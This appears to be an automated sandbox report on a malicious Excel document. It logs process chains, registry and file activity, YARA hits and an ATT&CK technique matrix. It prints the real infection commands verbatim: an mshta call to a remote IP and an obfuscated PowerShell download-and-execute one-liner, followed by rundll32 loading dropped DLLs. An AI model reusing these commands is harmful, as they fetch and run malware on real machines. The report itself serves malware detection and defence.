                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_100125C0 _printf, FindResourceW, LoadResource, SizeofResource, VirtualAllocExNuma, VirtualAlloc, _malloc, 9_2_100125C0
                            Source: imedpub.com_10.xls ReversingLabs: Detection: 30%
                            Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: PS C:\Users\Albus\Documents> Jump to behavior
                            Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe cmd /c mshta http://91.240.118.168/zzx/ccv/fe.html
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mshta.exe mshta http://91.240.118.168/zzx/ccv/fe.html
                            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.168/zzx/ccv/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll AnyString
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll AnyString
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\Public\Documents\ssd.dll",DllRegisterServer
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Qnjiyxnfa\jxnctwsmnhcex.tox",ZiXeiVCTiyE
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Qnjiyxnfa\jxnctwsmnhcex.tox",DllRegisterServer
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Eyummksnnunnmycc\yekquepksxa.zkh",lrHfvn
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Eyummksnnunnmycc\yekquepksxa.zkh",DllRegisterServer
                            Source: C:\Windows\System32\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32Jump to behavior
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRDF37.tmpJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlpJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlpJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_002D5988 CreateToolhelp32Snapshot,15_2_002D5988
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
                            Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                            Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SettingsJump to behavior
                            Source: Window RecorderWindow detected: More than 3 window changes detected
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dllJump to behavior
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                            Source: Binary string: ;.PDB source: powershell.exe, 00000006.00000002.672109254.000000000027A000.00000004.00000020.00020000.00000000.sdmp
                            Source: 41B1.tmp.0.drInitial sample: OLE indicators vbamacros = False
                            Source: C:\Windows\System32\mshta.exeCode function: 4_3_02E600C0 push 8B4902A7h; iretd 4_3_02E600C6
                            Source: C:\Windows\System32\mshta.exeCode function: 4_3_02E608C9 push 8B4902A7h; iretd 4_3_02E608CE
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10032B7D push ecx; ret 9_2_10032B90
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10030DFF push ecx; ret 9_2_10030E12
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_10032B7D push ecx; ret 11_2_10032B90
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_10030DFF push ecx; ret 11_2_10030E12
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003F0C04 push ss; ret 12_2_003F0E40
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_003F0F14 push FFFFFFF8h; retf 12_2_003F0F23
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1003D873 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__invoke_watson,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__invoke_watson,__decode_pointer,__decode_pointer,__decode_pointer,9_2_1003D873
                            Source: ssd.dll.6.drStatic PE information: real checksum: 0x8df98 should be: 0x91e13
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Documents\ssd.dllJump to dropped file
                            Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\SysWOW64\Qnjiyxnfa\jxnctwsmnhcex.tox (copy)Jump to dropped file

                            Hooking and other Techniques for Hiding and Protection

                            Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Qnjiyxnfa\jxnctwsmnhcex.tox:Zone.Identifier read attributes | deleteJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Eyummksnnunnmycc\yekquepksxa.zkh:Zone.Identifier read attributes | deleteJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_100134F0 IsIconic,9_2_100134F0
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10018C9A IsIconic,GetWindowPlacement,GetWindowRect,9_2_10018C9A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_100134F0 IsIconic,11_2_100134F0
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_10018C9A IsIconic,GetWindowPlacement,GetWindowRect,11_2_10018C9A
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOTJump to behavior
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\mshta.exe TID: 2408Thread sleep time: -360000s >= -30000sJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeAPI coverage: 3.2 %
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_000007FF00250DFC sldt word ptr [eax] 6_2_000007FF00250DFC
                            Source: C:\Windows\SysWOW64\rundll32.exe API call chain: ExitProcess graph end node graph_9-32094
                            Source: C:\Windows\SysWOW64\rundll32.exe API call chain: ExitProcess graph end node graph_11-32094
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
                            Source: mshta.exe, 00000004.00000003.417270436.0000000003188000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                            Source: rundll32.exe, 0000000C.00000002.538321202.000000000046A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10030334 VirtualQuery,GetSystemInfo,__invoke_watson,GetModuleHandleA,GetProcAddress,VirtualAlloc,VirtualProtect,9_2_10030334
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10021854 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,9_2_10021854
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10021854 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,11_2_10021854
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_002D7E00 FindFirstFileW,15_2_002D7E00
                            Source: C:\Windows\SysWOW64\rundll32.exe File Volume queried: C:\ FullSizeInformation
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003D873 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__invoke_watson,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__invoke_watson,__decode_pointer,__decode_pointer,__decode_pointer,9_2_1003D873
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_007A4087 mov eax, dword ptr fs:[00000030h] 9_2_007A4087
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00234087 mov eax, dword ptr fs:[00000030h] 10_2_00234087
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00344087 mov eax, dword ptr fs:[00000030h] 11_2_00344087
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_003E3487 mov eax, dword ptr fs:[00000030h] 12_2_003E3487
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00364087 mov eax, dword ptr fs:[00000030h] 12_2_00364087
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_002B4087 mov eax, dword ptr fs:[00000030h] 13_2_002B4087
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_002E4087 mov eax, dword ptr fs:[00000030h] 15_2_002E4087
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10037657 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,9_2_10037657
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10002280 SetLastError,SetLastError,SetLastError,SetLastError,GetNativeSystemInfo,SetLastError,VirtualAlloc,VirtualAlloc,SetLastError,GetProcessHeap,HeapAlloc,VirtualFree,SetLastError,VirtualAlloc,SetLastError,9_2_10002280
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1002F81E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,9_2_1002F81E
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003B89A SetUnhandledExceptionFilter,__encode_pointer,9_2_1003B89A
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003B8BC __decode_pointer,SetUnhandledExceptionFilter,9_2_1003B8BC
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003ACCC __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_1003ACCC
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10037657 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,11_2_10037657
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_1002F81E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,11_2_1002F81E
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_1003B89A SetUnhandledExceptionFilter,__encode_pointer,11_2_1003B89A
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_1003B8BC __decode_pointer,SetUnhandledExceptionFilter,11_2_1003B8BC
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_1003ACCC __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_1003ACCC

                            HIPS / PFW / Operating System Protection Evasion

                            Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 160.16.102.168 80
                            Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.168/zzx/ccv/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
                            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\mshta.exe mshta http://91.240.118.168/zzx/ccv/fe.html
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll AnyString
                            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll AnyString
                            Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\Public\Documents\ssd.dll",DllRegisterServer
                            Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Qnjiyxnfa\jxnctwsmnhcex.tox",ZiXeiVCTiyE
                            Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Qnjiyxnfa\jxnctwsmnhcex.tox",DllRegisterServer
                            Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Eyummksnnunnmycc\yekquepksxa.zkh",lrHfvn
                            Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Eyummksnnunnmycc\yekquepksxa.zkh",DllRegisterServer
                            Source: Yara match File source: imedpub.com_10.xls, type: SAMPLE
                            Source: Yara match File source: C:\Users\user\Desktop\imedpub.com_10.xls, type: DROPPED
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoA,9_2_1003F570
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetThreadLocale,GetLocaleInfoA,GetACP,9_2_10043730
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: _strcpy_s,__snprintf_s,GetLocaleInfoA,LoadLibraryA,9_2_10014B71
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoA,11_2_1003F570
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetThreadLocale,GetLocaleInfoA,GetACP,11_2_10043730
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: _strcpy_s,__snprintf_s,GetLocaleInfoA,LoadLibraryA,11_2_10014B71
                            Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
                            Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
                            Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\hh.exe VolumeInformation
                            Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation
                            Source: C:\Windows\SysWOW64\rundll32.exe Queries volume information: C:\ VolumeInformation
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003DAA7 cpuid 9_2_1003DAA7
                            Source: C:\Windows\SysWOW64\rundll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003906D GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,9_2_1003906D
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003CE1A __lock,__invoke_watson,__invoke_watson,__invoke_watson,____lc_codepage_func,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,__invoke_watson,__invoke_watson,9_2_1003CE1A
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_100453C8 GetVersion,GetVersion,GetVersion,GetVersion,GetVersion,RegisterClipboardFormatA,9_2_100453C8

                            Stealing of Sensitive Information

                            Source: Yara matchFile source: 0000000C.00000002.538540998.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.673171132.0000000002D81000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.672613597.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.672004438.0000000000180000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.493846362.0000000000BC0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.538682957.0000000002E91000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.538459946.0000000000A21000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.493656518.0000000000221000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.493927485.00000000022B0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.673263211.0000000002E41000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.673700095.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.673435114.0000000002F90000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.538786600.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.538736284.0000000002F91000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.538591662.0000000002821000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.672103586.0000000000300000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.538065858.00000000001E0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.672388917.0000000000870000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000009.00000002.447180476.0000000000791000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.673628550.0000000003691000.00000020.00000010.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000B.00000002.496825866.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.494040925.0000000002410000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.538366137.0000000000900000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: C:\Users\Public\Documents\ssd.dll, type: DROPPED
Source: C:\Windows\SysWOW64\rundll32.exe, Directory queried: C:\Users\Public\Documents

| Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| Valid Accounts | 21 Scripting | 1 Windows Service | 1 Windows Service | 1 Disable or Modify Tools | 1 Input Capture | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | Exfiltration Over Other Network Medium | 3 Ingress Tool Transfer | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition |
| Default Accounts | 1 Native API | Boot or Logon Initialization Scripts | 111 Process Injection | 1 Deobfuscate/Decode Files or Information | LSASS Memory | 13 File and Directory Discovery | Remote Desktop Protocol | 1 Data from Local System | Exfiltration Over Bluetooth | 11 Encrypted Channel | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
| Domain Accounts | 13 Exploitation for Client Execution | Logon Script (Windows) | Logon Script (Windows) | 21 Scripting | Security Account Manager | 38 System Information Discovery | SMB/Windows Admin Shares | 1 Email Collection | Automated Exfiltration | 2 Non-Application Layer Protocol | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
| Local Accounts | 11 Command and Scripting Interpreter | Logon Script (Mac) | Logon Script (Mac) | 2 Obfuscated Files or Information | NTDS | 1 Query Registry | Distributed Component Object Model | 1 Input Capture | Scheduled Transfer | 113 Application Layer Protocol | SIM Card Swap | | Carrier Billing Fraud |
| Cloud Accounts | 1 Service Execution | Network Logon Script | Network Logon Script | 21 Masquerading | LSA Secrets | 21 Security Software Discovery | SSH | 1 Clipboard Data | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings |
| Replication Through Removable Media | 1 PowerShell | Rc.common | Rc.common | 1 Modify Registry | Cached Domain Credentials | 2 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features |
| External Remote Services | Scheduled Task | Startup Items | Startup Items | 2 Virtualization/Sandbox Evasion | DCSync | 2 Process Discovery | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact |
| Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | 111 Process Injection | Proc Filesystem | 1 Application Window Discovery | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue |
| Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | 1 Hidden Files and Directories | /etc/passwd and /etc/shadow | 1 Remote System Discovery | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | | Data Destruction |
| Supply Chain Compromise | AppleScript | At (Windows) | At (Windows) | 1 Rundll32 | Network Sniffing | Process Discovery | Taint Shared Content | Local Data Staging | Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol | File Transfer Protocols | | | Data Encrypted for Impact |

Behavior Graph ID: 562396, Sample: imedpub.com_10.xls, Startdate: 28/01/2022, Architecture: WINDOWS, Score: 100

Top level:
• IP/domain: 129.232.188.93 xneeloZA South Africa
• IP/domain: 162.214.50.39 UNIFIEDLAYER-AS-1US United States
• 42 other IPs or domains
• Signature: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
• Signature: Multi AV Scanner detection for domain / URL
• Signature: Found malware configuration
• 17 other signatures

Process chain (each process is started by the one listed before it):
• EXCEL.EXE
    dropped: C:\Users\user\Desktop\imedpub.com_10.xls, Composite
• cmd.exe
• mshta.exe
